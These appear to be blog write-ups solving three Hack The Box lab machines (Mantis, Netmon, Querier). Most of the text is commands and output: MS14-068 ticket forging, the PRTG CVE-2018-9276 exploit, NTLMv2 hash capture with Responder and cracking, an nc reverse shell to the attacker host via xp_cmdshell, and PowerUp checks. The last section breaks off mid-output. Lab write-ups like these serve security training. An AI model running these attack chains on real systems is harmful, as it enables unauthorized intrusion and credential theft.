To practice pentesting for Active Directory environment, solved an old machine “Mantis” on Hackthebox.
Solution
1. Initial Enumeration
TCP Port Scanning:
root@kali:~# nmap -p- 10.10.10.52 -sC-sV
Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-11 10:47 EEST
Nmap scan report for 10.10.10.52
Host is up (0.039s latency).
Not shown: 65511 closed ports
PORT STATE SERVICE VERSION
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2019-08-11 07:58:55Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
1337/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
1433/tcp open ms-sql-s Microsoft SQL Server 2014 12.00.2000.00; RTM
| ms-sql-ntlm-info:
| Target_Name: HTB
| NetBIOS_Domain_Name: HTB
| NetBIOS_Computer_Name: MANTIS
| DNS_Domain_Name: htb.local
| DNS_Computer_Name: mantis.htb.local
|_ Product_Version: 6.1.7601
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2019-08-11T07:49:10
|_Not valid after: 2049-08-11T07:49:10
|_ssl-date: 2019-08-11T07:59:49+00:00; +1m31s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5722/tcp open msrpc Microsoft Windows RPC
9389/tcp open mc-nmf .NET Message Framing
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49164/tcp open msrpc Microsoft Windows RPC
49165/tcp open msrpc Microsoft Windows RPC
49168/tcp open msrpc Microsoft Windows RPC
50255/tcp open ms-sql-s Microsoft SQL Server 2014 12.00.2000
| ms-sql-ntlm-info:
| Target_Name: HTB
| NetBIOS_Domain_Name: HTB
| NetBIOS_Computer_Name: MANTIS
| DNS_Domain_Name: htb.local
| DNS_Computer_Name: mantis.htb.local
|_ Product_Version: 6.1.7601
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2019-08-11T07:49:10
|_Not valid after: 2049-08-11T07:49:10
|_ssl-date: 2019-08-11T07:59:48+00:00; +1m31s from scanner time.
Service Info: Host: MANTIS; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 35m48s, deviation: 1h30m43s, median: 1m30s
| ms-sql-info:
| 10.10.10.52:1433:
| Version:
| name: Microsoft SQL Server 2014 RTM
| number: 12.00.2000.00
| Product: Microsoft SQL Server 2014
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| smb-os-discovery:
| OS: Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows Server 2008 R2 Standard 6.1)
| OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
| Computer name: mantis
| NetBIOS computer name: MANTIS\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: mantis.htb.local
|_ System time: 2019-08-11T03:59:49-04:00
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2019-08-11 10:59:53
|_ start_date: 2019-08-11 10:48:43
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 768.99 seconds
SMB enumeration:
root@kali:~# smbclient -L 10.10.10.52
Enter WORKGROUP\root's password:
Anonymous login successful
Sharename Type Comment
--------- ---- -------
smb1cli_req_writev_submit: called for dialect[SMB2_10] server[10.10.10.52]
Error returning browse list: NT_STATUS_REVISION_MISMATCH
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.52 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Failed to connect with SMB1 -- no workgroup available
Besides, if we scroll down the text file, there are some hidden(?) lines.
root@kali:~# curl http://10.10.10.52:1337/secure_notes/dev_notes_NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx.txt.txt
1. Download OrchardCMS
2. Download SQL server 2014 Express ,create user "admin",and create orcharddb database
3. Launch IIS and add new website and point to Orchard CMS folder location.
4. Launch browser and navigate to http://localhost:8080
5. Set admin password and configure sQL server connection string.
6. Add blog pages with admin user.
~~~
Credentials stored in secure format
OrchardCMS admin creadentials 010000000110010001101101001000010110111001011111010100000100000001110011011100110101011100110000011100100110010000100001
SQL Server sa credentials file namez
m$$ql_S@_P@ssW0rd! # Possible password for MSSQL
@dm!n_P@ssW0rd! # Possible password for OrchardCMS
Then, try to login to the SQL server.
We have “mssqlclient.py” in the package Impacket installed by default.
root@kali:~# /usr/share/doc/python-impacket/examples/mssqlclient.py -p 1433 admin@10.10.10.52
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation
Password: # m$$ql_S@_P@ssW0rd![*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: None, New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(MANTIS\SQLEXPRESS): Line 1: Changed database context to 'master'.[*] INFO(MANTIS\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (120 7208)[!] Press help for extra shell commands
SQL>
Then, list all databases.
SQL> select name from master.dbo.sysdatabases
name
--------------------------------------------------------------------------------------------------------------------------------
master
tempdb
model
msdb
orcharddb
Next, try to find a user table for orcharddb.
SQL> use orcharddb
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: orcharddb
[*] INFO(MANTIS\SQLEXPRESS): Line 1: Changed database context to 'orcharddb'.
SQL> select table_name from information_schema.tables where table_name like '%User%'
table_name
--------------------------------------------------------------------------------------------------------------------------------
blog_Orchard_Users_UserPartRecord
blog_Orchard_Roles_UserRolesPartRecord
Then, get user credential from the table ‘blog_Orchard_Users_UserPartRecord’
SQL> select column_name from information_schema.columns where table_name='blog_Orchard_Users_UserPartRecord'
column_name
--------------------------------------------------------------------------------------------------------------------------------
Id
UserName
Email
NormalizedUserName
Password
PasswordFormat
HashAlgorithm
PasswordSalt
RegistrationStatus
EmailStatus
EmailChallengeToken
CreatedUtc
LastLoginUtc
LastLogoutUtc
SQL> select UserName,Password from blog_Orchard_Users_UserPartRecord
admin AL1337E2D6YHm0iIysVzG8LA76OozgMSlyOJk1Ov5WCGK+lgKY6vrQuswfWHKZn2+A==
James J@m3s_P@ssW0rd!
To confirm if we can use this credential, we can run smbclient.
root@kali:~# smbclient -L 10.10.10.52 -U james
Enter WORKGROUP\james's password: # J@m3s_P@ssW0rd!
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.52 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Failed to connect with SMB1 -- no workgroup available
After that, we can use “goldenPac.py” for MS14-068, which is installed by default on the Kali Linux.
At first, add following lines in “/etc/hosts”
Then, execute the script with following way to forge a “Golden ticket” and execute psexec.
We can achieve an system shell.
root@kali:~# /usr/share/doc/python-impacket/examples/goldenPac.py htb.local/james@mantis.htb.local
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation
Password: # J@m3s_P@ssW0rd![*] User SID: S-1-5-21-4220043660-4019079961-2895681657-1103
[*] Forest SID: S-1-5-21-4220043660-4019079961-2895681657
[*] Attacking domain controller mantis.htb.local
[*] mantis.htb.local found vulnerable!
[*] Requesting shares on mantis.htb.local.....
[*] Found writable share ADMIN$[*] Uploading file xcTsamva.exe
[*] Opening SVCManager on mantis.htb.local.....
[*] Creating service qxQT on mantis.htb.local.....
[*] Starting service qxQT.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system
root.txt is in the home directory of Administrator.
Hackthebox is a website which has bunch of vulnerable machines in its own VPN.
This is a write-up of machine “Netmon” on that website.
Solution
1. Initial Enumeration
TCP Port Scanning:
root@kali:~# nmap -p- 10.10.10.152 -sC-sV
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-28 12:40 EEST
Stats: 0:16:35 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 60.32% done; ETC: 13:07 (0:10:54 remaining)
Nmap scan report for 10.10.10.152
Host is up (0.31s latency).
Not shown: 65522 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-03-19 12:18AM 1024 .rnd
| 02-25-19 10:15PM <DIR> inetpub
| 06-24-19 03:13PM 74 output.txt
| 07-16-16 09:18AM <DIR> PerfLogs
| 02-25-19 10:56PM <DIR> Program Files
| 02-03-19 12:28AM <DIR> Program Files (x86)
| 02-03-19 08:08AM <DIR> Users
|_02-25-19 11:49PM <DIR> Windows
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
|_http-server-header: PRTG/18.1.37.13946
| http-title: Welcome | PRTG Network Monitor (NETMON)
|_Requested resource was /index.htm
|_http-trane-info: Problem with XML parsing of /evox/about
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -1s, deviation: 0s, median: -1s
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2019-06-28 13:07:09
|_ start_date: 2019-06-24 07:07:57
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1616.17 seconds
root@kali:~# ftp 10.10.10.152
Connected to 10.10.10.152.
220 Microsoft FTP Service
Name (10.10.10.152:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
02-03-19 12:18AM 1024 .rnd
02-25-19 10:15PM <DIR> inetpub
07-16-16 09:18AM <DIR> PerfLogs
02-25-19 10:56PM <DIR> Program Files
02-03-19 12:28AM <DIR> Program Files (x86)
02-03-19 08:08AM <DIR> Users
02-25-19 11:49PM <DIR> Windows
226 Transfer complete.
2. Getting User
Pretty straightforward.
We can take advantage of opening FTP and access to the user folder as annonymous.
ftp> pwd
257 "/users/Public" is current directory.
ftp> get user.txt
local: user.txt remote: user.txt
200 PORT command successful.
125 Data connection already open; Transfer starting.
WARNING! 1 bare linefeeds received in ASCII mode
File may not have transferred correctly.
226 Transfer complete.
33 bytes received in 0.30 secs (0.1083 kB/s)
We have a RCE but we need the credential of PRTG user.
According to this page, it is stored in the directory “/Programdata/Paessler/PRTG Network Monitor”
ftp> pwd
257 "/Programdata/Paessler/PRTG Network Monitor" is current directory.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
02-03-19 12:40AM <DIR> Configuration Auto-Backups
07-01-19 12:17AM <DIR> Log Database
02-03-19 12:18AM <DIR> Logs (Debug)
02-03-19 12:18AM <DIR> Logs (Sensors)
02-03-19 12:18AM <DIR> Logs (System)
07-01-19 12:17AM <DIR> Logs (Web Server)
07-01-19 12:22AM <DIR> Monitoring Database
02-25-19 10:54PM 1189697 PRTG Configuration.dat
02-25-19 10:54PM 1189697 PRTG Configuration.old
07-14-18 03:13AM 1153755 PRTG Configuration.old.bak
07-01-19 04:28AM 1723418 PRTG Graph Data Cache.dat
02-25-19 11:00PM <DIR> Report PDFs
02-03-19 12:18AM <DIR> System Information Database
02-03-19 12:40AM <DIR> Ticket Database
02-03-19 12:18AM <DIR> ToDo Database
226 Transfer complete.
In the file “PRTG Configuration.old.bak”, we have a plaintext credential.
But to login, we need to change the password to “PrTg@dmin2019”
Then, launch the Burp suite and login to PRTG console.
This is because we have to grab the authenticated cookie to run the exploit code.
After that run the exploit with the cookie.
This creates a new admin user “pentest:P3nT3st!”.
root@kali:~# ./46527.sh -u http://10.10.10.152 -c"OCTOPUS1813713946=e0ZDRjY2MjdBLUMzNjEtNEY0Mi1CQ0JGLUU3NUEzQzlBRDZDMX0%3D"[+]#########################################################################[+]
[*] Authenticated PRTG network Monitor remote code execution [*][+]#########################################################################[+]
[*] Date: 11/03/2019 [*][+]#########################################################################[+]
[*] Author: https://github.com/M4LV0 lorn3m4lvo@protonmail.com [*][+]#########################################################################[+]
[*] Vendor Homepage: https://www.paessler.com/prtg [*][*] Version: 18.2.38 [*][*] CVE: CVE-2018-9276 [*][*] Reference: https://www.codewatch.org/blog/?p=453 [*][+]#########################################################################[+]
# login to the app, default creds are prtgadmin/prtgadmin. once athenticated grab your cookie and use it with the script.# run the script to create a new user 'pentest' in the administrators group with password 'P3nT3st!' [+]#########################################################################[+]
[*] file created
[*] sending notification wait....
[*] adding a new user 'pentest' with password 'P3nT3st'[*] sending notification wait....
[*] adding a user pentest to the administrators group
[*] sending notification wait....
[*] exploit completed new user 'pentest' with password 'P3nT3st!' created have fun!
Now we have administrator credential.
Try to access with “psexec.py” which is installed by default in the package Impacket.
root@kali:~# /usr/share/doc/python-impacket/examples/psexec.py pentest@10.10.10.152
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation
Password:
[*] Requesting shares on 10.10.10.152.....
[*] Found writable share ADMIN$[*] Uploading file zNVocYtQ.exe
[*] Opening SVCManager on 10.10.10.152.....
[*] Creating service aGrP on 10.10.10.152.....
[*] Starting service aGrP.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system
root.txt is in the directory “C:\Users\Administrator\Desktop”
Hackthebox is a website which has bunch of vulnerable machines in its own VPN.
This is a write-up of machine “Querier” on that website.
Solution
1. Initial Enumeration
TCP Port Scanning:
root@kali:~# nmap -p- 10.10.10.125 -sV-sC
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-22 11:04 EEST
Nmap scan report for 10.10.10.125
Host is up (0.039s latency).
Not shown: 65521 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
1433/tcp open ms-sql-s Microsoft SQL Server 14.00.1000.00
| ms-sql-ntlm-info:
| Target_Name: HTB
| NetBIOS_Domain_Name: HTB
| NetBIOS_Computer_Name: QUERIER
| DNS_Domain_Name: HTB.LOCAL
| DNS_Computer_Name: QUERIER.HTB.LOCAL
| DNS_Tree_Name: HTB.LOCAL
|_ Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2019-06-18T12:52:51
|_Not valid after: 2049-06-18T12:52:51
|_ssl-date: 2019-06-22T07:06:20+00:00;-1h00m10s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -1h00m10s, deviation: 0s, median: -1h00m10s
| ms-sql-info:
| 10.10.10.125:1433:
| Version:
| name: Microsoft SQL Server
| number: 14.00.1000.00
| Product: Microsoft SQL Server
|_ TCP port: 1433
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2019-06-22 10:06:21
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 100.11 seconds
SMB enumeration:
root@kali:~# smbclient -L //10.10.10.125/
Enter WORKGROUP\root's password:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
Reports Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.125 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Failed to connect with SMB1 -- no workgroup available
2. Getting User
In the SMB share //10.10.10.125/Reports, we can find an interesting .xlsm file.
root@kali:~# smbclient //10.10.10.125/Reports
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Tue Jan 29 01:23:48 2019
.. D 0 Tue Jan 29 01:23:48 2019
Currency Volume Report.xlsm A 12229 Mon Jan 28 00:21:34 2019
6469119 blocks of size 4096. 1508496 blocks available
smb: \>
It’s a empty looks Microsoft excel file.
However, “.xlsm” file is practically just a zip archive and we can unzip like following.
Then, we can check if there is anything interesting with strings command.
root@kali:~# strings xl/*
strings: Warning: 'xl/_rels' is a directory
<?xml version="1.0"encoding="UTF-8"standalone="yes"?>
<styleSheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac x16r2 xr" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:x16r2="http://schemas.microsoft.com/office/spreadsheetml/2015/02/main" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision"><fonts count="1" x14ac:knownFonts="1"><font><sz val="11"/><color theme="1"/><name val="Calibri"/><family val="2"/><scheme val="minor"/></font></fonts><fills count="2"><fill><patternFill patternType="none"/></fill><fill><patternFill patternType="gray125"/></fill></fills><borders count="1"><border><left/><right/><top/><bottom/><diagonal/></border></borders><cellStyleXfs count="1"><xf numFmtId="0"fontId="0"fillId="0"borderId="0"/></cellStyleXfs><cellXfs count="1"><xf numFmtId="0"fontId="0"fillId="0"borderId="0"xfId="0"/></cellXfs><cellStyles count="1"><cellStyle name="Normal"xfId="0"builtinId="0"/></cellStyles><dxfs count="0"/><tableStyles count="0"defaultTableStyle="TableStyleMedium2"defaultPivotStyle="PivotStyleLight16"/><extLst><ext uri="{EB79DEF2-80B8-43e5-95BD-54CBDDF9020C}" xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main"><x14:slicerStyles defaultSlicerStyle="SlicerStyleLight1"/></ext><ext uri="{9260A510-F301-46a8-8635-F512D64BE5F5}" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main"><x15:timelineStyles defaultTimelineStyle="TimeSlicerStyleLight1"/></ext></extLst></styleSheet>
strings: Warning: 'xl/theme' is a directory
macro to pull data for client volume reports
n.Conn]
Open
rver=<
SELECT * FROM volume;
word>
MsgBox "connection successful"
Set rs = conn.Execute("SELECT * @@version;")Driver={SQL Server};Server=QUERIER;Trusted_Connection=no;Database=volume;Uid=reporting;Pwd=PcwTWTHRwryjc$c6
...
On the last line of previous command, we can find a possible credential for SQL server.
Then, try to connect to MSSQL with above password.
Kali has the impacket installation by default and we can take advantage of script “mssqlclient.py”.
root@kali:/usr/share/doc/python-impacket/examples# ./mssqlclient.py -windows-auth reporting@10.10.10.125
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation
Password: # PcwTWTHRwryjc$c6 [*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: volume
[*] ENVCHANGE(LANGUAGE): Old Value: None, New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(QUERIER): Line 1: Changed database context to 'volume'.[*] INFO(QUERIER): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232)[!] Press help for extra shell commands
SQL>
Try to execute xp_cmdshell stored procedure.
However, user “reporting” doesn’t have a permission for that.
SQL> xp_cmdshell cmd.exe
[-] ERROR(QUERIER): Line 1: The EXECUTE permission was denied on the object 'xp_cmdshell', database 'mssqlsystemresource', schema 'sys'.
Next, try to steal the NTLMv2 hash.
Since Windows uses single-sign-on, by intercepting the traffic, we can achieve the hash.
Run the responder and execute following command on MSSQL.
root@kali:~# responder -I tun0 -wrfv
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ ||-__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 2.3.3.9
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CRTL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
DNS/MDNS [ON]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [ON]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Fingerprint hosts [ON]
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.14.2]
Challenge set[random]
Don't Respond To Names ['ISATAP']
[+] Listening for events...
[SMBv2] NTLMv2-SSP Client : 10.10.10.125
[SMBv2] NTLMv2-SSP Username : QUERIER\mssql-svc
[SMBv2] NTLMv2-SSP Hash : mssql-svc::QUERIER:deb00bb106fe5da1:EB8A91F8C63C227442BC2AF1EB17959B:0101000000000000C0653150DE09D2012A46EC56A8D46106000000000200080053004D004200330001001E00570049004E002D00500052004800340039003200520051004100460056000400140053004D00420033002E006C006F00630061006C0003003400570049004E002D00500052004800340039003200520051004100460056002E0053004D00420033002E006C006F00630061006C000500140053004D00420033002E006C006F00630061006C0007000800C0653150DE09D201060004000200000008003000300000000000000000000000003000003D3A30F75BF9F458BD19D50ED26B7496E8FCB92F534405B48E047D4E2B7ADDB50A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310034002E003200000000000000000000000000
[SMBv2] NTLMv2-SSP Client : 10.10.10.125
[SMBv2] NTLMv2-SSP Username : QUERIER\mssql-svc
[SMBv2] NTLMv2-SSP Hash : mssql-svc::QUERIER:19dda42e4d064351:5F4756B9EAD915C12102FDB6A3725118:0101000000000000C0653150DE09D20124480B4BE0560D5F000000000200080053004D004200330001001E00570049004E002D00500052004800340039003200520051004100460056000400140053004D00420033002E006C006F00630061006C0003003400570049004E002D00500052004800340039003200520051004100460056002E0053004D00420033002E006C006F00630061006C000500140053004D00420033002E006C006F00630061006C0007000800C0653150DE09D201060004000200000008003000300000000000000000000000003000003D3A30F75BF9F458BD19D50ED26B7496E8FCB92F534405B48E047D4E2B7ADDB50A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310034002E003200000000000000000000000000
[SMBv2] NTLMv2-SSP Client : 10.10.10.125
[SMBv2] NTLMv2-SSP Username : \gX
[SMBv2] NTLMv2-SSP Hash : gX:::95b69835a01d6daf::
[SMBv2] NTLMv2-SSP Client : 10.10.10.125
[SMBv2] NTLMv2-SSP Username : \gX
[SMBv2] NTLMv2-SSP Hash : gX:::becdc277e39afb84::
Now, we got a hash for user mssql-svc.
Then try to crack with John the Ripper.
root@kali:~# cat hash.txt
mssql-svc::QUERIER:19dda42e4d064351:5F4756B9EAD915C12102FDB6A3725118:0101000000000000C0653150DE09D20124480B4BE0560D5F000000000200080053004D004200330001001E00570049004E002D00500052004800340039003200520051004100460056000400140053004D00420033002E006C006F00630061006C0003003400570049004E002D00500052004800340039003200520051004100460056002E0053004D00420033002E006C006F00630061006C000500140053004D00420033002E006C006F00630061006C0007000800C0653150DE09D201060004000200000008003000300000000000000000000000003000003D3A30F75BF9F458BD19D50ED26B7496E8FCB92F534405B48E047D4E2B7ADDB50A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310034002E003200000000000000000000000000
root@kali:~# john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash(netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
corporate568 (mssql-svc)
1g 0:00:00:08 DONE (2019-06-23 18:29) 0.1149g/s 1030Kp/s 1030Kc/s 1030KC/s correforenz..coreyny11
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed
This means that we got following credential.
mssql-svc:corporate568
Since we got a credential for mssql, try to login again with the cred.
root@kali:~# /usr/share/doc/python-impacket/examples/mssqlclient.py -windows-auth mssql-svc@10.10.10.125
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation
Password: # corporate568[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: None, New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(QUERIER): Line 1: Changed database context to 'master'.[*] INFO(QUERIER): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232)[!] Press help for extra shell commands
SQL>
This time, we have to enable the stored procedure “xp_cmdshell”.
SQL> enable_xp_cmdshell
[*] INFO(QUERIER): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
[*] INFO(QUERIER): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL>
Then, we somehow need to get a reverse shell.
Try to upload nc.exe which is installed Kali by default in the following directory.
root@kali:/usr/share/windows-resources/binaries# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
Execute xp_cmdshell and download the nc.exe from our localhost.
root@kali:~# nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.2] from (UNKNOWN)[10.10.10.125] 49715
Microsoft Windows [Version 10.0.17763.292]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
querier\mssql-svc
User.txt is in the hoge directory of user mssql-svc.
C:\Users\mssql-svc\Desktop>type user.txt
type user.txt
c37b41bb669da345bb14de50faab3c16
After the uploading, we can execute following commands to import the powershell script.
C:\Users\mssql-svc\Desktop>powershell.exe -nop-exec bypass
powershell.exe -nop-exec bypass
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Users\mssql-svc\Desktop> import-module ./powerup.ps1
import-module ./powerup.ps1
Then, execute “Invoke-AllChecks”.
PS C:\Users\mssql-svc\Desktop> invoke-allchecks
invoke-allchecks
[*] Running Invoke-AllChecks
[*] Checking if user is in a local group with administrative privileges...
[*] Checking for unquoted service paths...
[*] Checking service executable and argument permissions...
[*] Checking service permissions...
ServiceName : UsoSvc
Path : C:\Windows\system32\svchost.exe -k netsvcs -p
StartName : LocalSystem
AbuseFunction : Invoke-ServiceAbuse -Name'UsoSvc'
CanRestart : True
[*] Checking %PATH% for potentially hijackable DLL locations...
ModifiablePath : C:\Users\mssql-svc\AppData\Local\Microsoft\WindowsApps
IdentityReference : QUERIER\mssql-svc
Permissions : {WriteOwner, Delete, WriteAttributes, Synchronize...}
%PATH% : C:\Users\mssql-svc\AppData\Local\Microsoft\WindowsApps
AbuseFunction : Write-HijackDll -DllPath'C:\Users\mssql-svc\AppData\Local\Microsoft\WindowsApps\wlbsctrl.dll'[*] Checking for AlwaysInstallElevated registry key...
[*] Checking for Autologon credentials in registry...
[*] Checking for modifidable registry autoruns and configs...
[*] Checking for modifiable schtask files/configs...
[*] Checking for unattended install files...
UnattendPath : C:\Windows\Panther\Unattend.xml
[*] Checking for encrypted web.config strings...
[*] Checking for encrypted application pool and virtual directory passwords...
[*] Checking for plaintext passwords in McAfee SiteList.xml files....
[*] Checking for cached Group Policy Preferences .xml files....
Changed : {2019-01-28 23:12:48}
